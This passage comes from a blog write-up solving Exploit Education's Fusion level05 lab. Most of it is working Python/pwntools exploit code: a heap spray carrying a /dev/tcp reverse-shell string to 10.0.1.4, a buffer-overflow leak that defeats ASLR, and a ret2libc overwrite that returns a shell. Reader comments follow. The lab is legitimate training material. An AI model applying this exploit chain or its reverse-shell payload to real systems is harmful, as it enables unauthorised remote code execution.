            log.warning("OK, crashing the program")
            io.sendline(content + b"A"*12)
            sys.exit(1)

    elif data == b" is not indexed already\n" and not prev_bad:
        log.failure("We've hit a null region. Something went wrong.")
        log.info(f"Last address read: {read+0x1000:#010x}")
        sys.exit(1)

    read -= 0x1000
    prev_bad = False

This went through a lot of trial-and-error and there’s probably a better way of doing it than this. But it works.

andrew ~/level05 $ ./find_system.py
[+] Opening connection to fusion on port 20005: Done
[*] ** welcome to level05 **
[*] Searching…
[*] Last address read: 0xb876f7d8
[+] Found address to childtask(): 0xb7876c70
[+] The write@got.plt address: 0xb787b1a8
[+] The address to write() is: 0xb778d2c0
[+] The address to system() is: 0xb7708b20

Getting A Reverse Shell

Now that we have the address to the system() function, We can use the buffer overflow in the get_and_hash() function to take control of the program and execute our reverse shell string. It’s as simple as overwriting the saved EIP register on the stack with the address to system() and and supplying it with the address to our reverse shell string as an argument.

#!/usr/bin/env python3

from pwn import *
import sys

bad_chars = [b'\0', b'\x0a', b'\x0d', b'\x40']
def bad(addr):
    if any(bad in p32(addr) for bad in bad_chars):
        return True
    else:
        return False

###################
SYSTEM = 0xb7750b20
STRING = 0xb87c9864
###################
if bad(SYSTEM):
    log.failure("The system() address contains a bad byte"
                "It is recommended to crash the program so you can start over.")
    log.warning("NOTE: You will need to spray the heap again")
    crash = input("Crash the program? [Y/n] ")
    if crash.lower() == "n":
        log.failure("Exiting")
        sys.exit(1)
    else:
        log.warning("OK, crashing the program")
        io.sendline(content + b"A"*12)
        sys.exit(1)

content  = b"checkname "
content += b"A" * 44
content += p32(SYSTEM)
content += b"A" * 4
content += p32(STRING)

io = remote("fusion", 20005)
log.info(io.recvline())
l = listen(1337)
io.sendline(content)

l.wait_for_connection()
l.interactive()
andrew ~/level05 $ ./rshell.py 
[+] Opening connection to fusion on port 20005: Done
[*] ** welcome to level05 **
[+] Trying to bind to :: on port 1337: Done
[+] Waiting for connections on :::1337: Got connection from ::ffff:10.0.1.5 on port 55669
[*] Switching to interactive mode
$ id
uid=20005 gid=20005 groups=20005
$

Conclusion

Wow, this was a long one. I did my best to explain everything as much as possible. Of course, some prerequisite knowledge is still required. But if you, dear reader, feel like I did a poor job at explaining something, leave a comment. It is my goal here to provide the best write-up possible.

Here’s a quick TLDR on what we did:

  • Spray the heap with a reverse shell string
    • Need enough to ensure we can start guessing at addresses and hit our data
    • This is only possible because the program does not properly free heap-allocated space
  • Use the BOF vulnerability in the get_and_hash() function to find a valid file descriptor address in our data
    • Using the checkname command will call this function
    • We’ll know we’ve hit a valid file descriptor (4) when we get a response from the server
  • This causes an information leak vulnerability that allows us to read data from the heap
    • The address pointing to the string returned to the client is right after the file descriptor on the stack
    • We keep stepping back & reading data from the heap all the way to the beginning
    • There’s pointers to several functions in the level05 binary near the beginning of the heap
    • Leaking one of those addresses (checkname() is used here) allows us to defeat ASLR
  • Read the address to a Libc function from the .got.plt section
    • The function used here is write() and it’s address is at a constant offset from checkname()
    • Calculate the system() function address as it is a constant offset from write()
  • Utilize the BOF vulnerability to overwrite the saved EIP register with the address to system()
    • The next 4 bytes after that can be anything, however, it’s recommended to use the address to exit()
    • This prevents the program from causing a segfault when you quit the reverse shell
    • The last 4 bytes are the address to our reverse shell string as an argument to system()

One last thing to do is to put this all together into a single exploit script.

#!/usr/bin/env python3

from pwn import *
import time
import sys


def connect():
    io = remote("fusion", 20005)
    log.info(io.recvline())
    return io


### HEAP SPRAY #################################################################
def spray(io):
    buff_sz = 504
    command  = b"isup "
    content  = b"ABC "
    content += b"/bin/sh > /dev/tcp/10.0.1.4/1337 0>&1 2>&1; " # 44 bytes
    content += b"A" * (buff_sz - len(content))
    content += pack(4)

    max_spray = 60222
    with log.progress('Spraying') as p:
        for i in range(max_spray):
            io.send(command + content)
            p.status(f"{(i/max_spray):.2%}")
            time.sleep(0.005)

    io.close()
    print()


### LEAK FILE DESCRIPTOR #######################################################
CHECKNAME  = b"checkname "
CHECKNAME += b"A" * 32

def leak_fd(io):
    print()
    start_addr = 0xb9700108

    log.info("Searching for a valid file descriptor...")
    for fd in range(start_addr, start_addr+528, 16):
        io.sendline(CHECKNAME + p32(fd))
        data = io.recvline(timeout=0.1)

        if b"indexed already" in data:
            log.success(f"File descriptor address: {fd:#010x}")
            string = fd + 28
            log.success(f"Reverse shell string at: {string:#010x}")
            break
    else:
        log.error("File descriptor address not found!")

    return fd, string


### FIND SYSTEM() ADDRESS ######################################################
def send(io, fd, read_ptr):
    payload  = CHECKNAME
    payload += p32(fd)
    payload += p32(read_ptr)
    io.sendline(payload)
    return io.recvline(timeout=0.1)


def crash(io):
    log.failure("It is recommended to crash the program so you can start over.")
    log.warning("NOTE: You will need to spray the heap again")
    resp = input("Crash the program? [Y/n] ")
    if resp.lower() == "n":
        log.failure("Exiting")
        sys.exit(1)
    else:
        log.warning("OK, crashing the program")
        io.sendline(CHECKNAME + b"A"*12)
        sys.exit(1)


def bad(addr):
    bad_chars = [b'\0', b'\x0a', b'\x0d', b'\x40']
    if any(bad in p32(addr) for bad in bad_chars):
        return True
    return False


def find_system(io, fd):
    print()
    # Keep track of when the previous address contained a bad byte
    prev_bad = False
    align = 0x860
    read = ((fd - align - 1) & 0xfffff000) + align
    log.info("Searching for system()...")

    while read > 0xb7000000:
        if bad(read):
            #log.failure(f"Bad byte found in address {read:#010x}")
            prev_bad = True
            read -= 0x1000
            continue

        time.sleep(0.005)
        data = send(io, fd, read)

        if not data:
            log.error("No data received. Either the program crashed or you have a bad file descriptor address.")

        elif data[:3] == b"ABC":
            prev_inuse = send(io, fd, read - 24)

            if prev_inuse[:2] == b"\xa0\x83":
                # childtask() ptr offset from start of user-supplied heap = -136 bytes
                childtask_str = send(io, fd, read - 136)
                childtask = unpack(childtask_str[:4])
                write_str = send(io, fd, childtask + 0x4538)
                write_addr = unpack(write_str[:4])
                system = write_addr - 0x847a0
                log.success(f"Address to childtask() stored at: {read-136:#010x}")
                log.success(f"          Address to childtask(): {childtask:#010x}")
                log.success(f"       The write@got.plt address: {childtask+0x4538:#010x}")
                log.success(f"       The address to write() is: {write_addr:#010x}")
                log.success(f"      The address to system() is: {system:#010x}")
                break

        elif data == b" is not indexed already\n" and prev_bad:
            log.failure(f"The last address read ({read+0x1000:#010x}) contained a bad byte and now we've hit a null region.\n"
                        "The pointer to childtask() may be unreadable if its address has one or more bad bytes in it.")
            crash(io)

        elif data == b" is not indexed already\n" and not prev_bad:
            log.failure("We've hit a null region. Something went wrong.")
            log.info(f"Last address read: {read+0x1000:#010x}")
            sys.exit(1)

        read -= 0x1000
        prev_bad = False
    else:
        log.error("Something went wrong. Unable to find pointer to childtask() in the heap.")

    return system


### GET REVERSE SHELL ##########################################################
def rshell(io, system, string):
    print()
    if bad(system):
        log.failure("The system() address contains a bad byte")
        crash(io)

    EXIT = system - 0xa140

    payload  = CHECKNAME
    payload += b"A" * 12
    payload += p32(system)
    payload += p32(EXIT)
    payload += p32(string)

    l = listen(1337)
    io.sendline(payload)

    l.wait_for_connection()
    l.interactive()


if __name__ == "__main__":
    io = connect()
    spray(io)
    io = connect()
    fd, string = leak_fd(io)
    system = find_system(io, fd)
    rshell(io, system, string)

5 thoughts on “Exploit Education | Fusion | Level 05 Solution

  1. duck says:

    > The comma operator in the for loop says to keep looping whle i is less than maxsz OR while string[i] exists.

    although it doesn’t matter for the exploitation, I Just wanted to correct this. the comma operator returns only the last value of the expression, so it will keep looping while string[i] exists, completely ignoring maxsz.

    https://stackoverflow.com/questions/52550/what-does-the-comma-operator-do

    other than that great article

    Reply
  2. Chicken says:

    Hey good solution! One question.

    How come you don’t overwrite the address on the heap storing the address isup, when performing your spray?

    Wouldn’t your ‘garbage’ data actually overwrite the contents of that address and thus when later reading the address containg “isup” it would return your garbage data?

    best regards.

    Reply
  3. Christian Gabriel says:

    Love this breakdown. I’ll have to read this again. Really want to get to this level of pwn because its genuinely my favourite. What path to you recommend to learn on how to read ASM?

    Reply

Leave a Reply to Andrew Lamarra Cancel reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.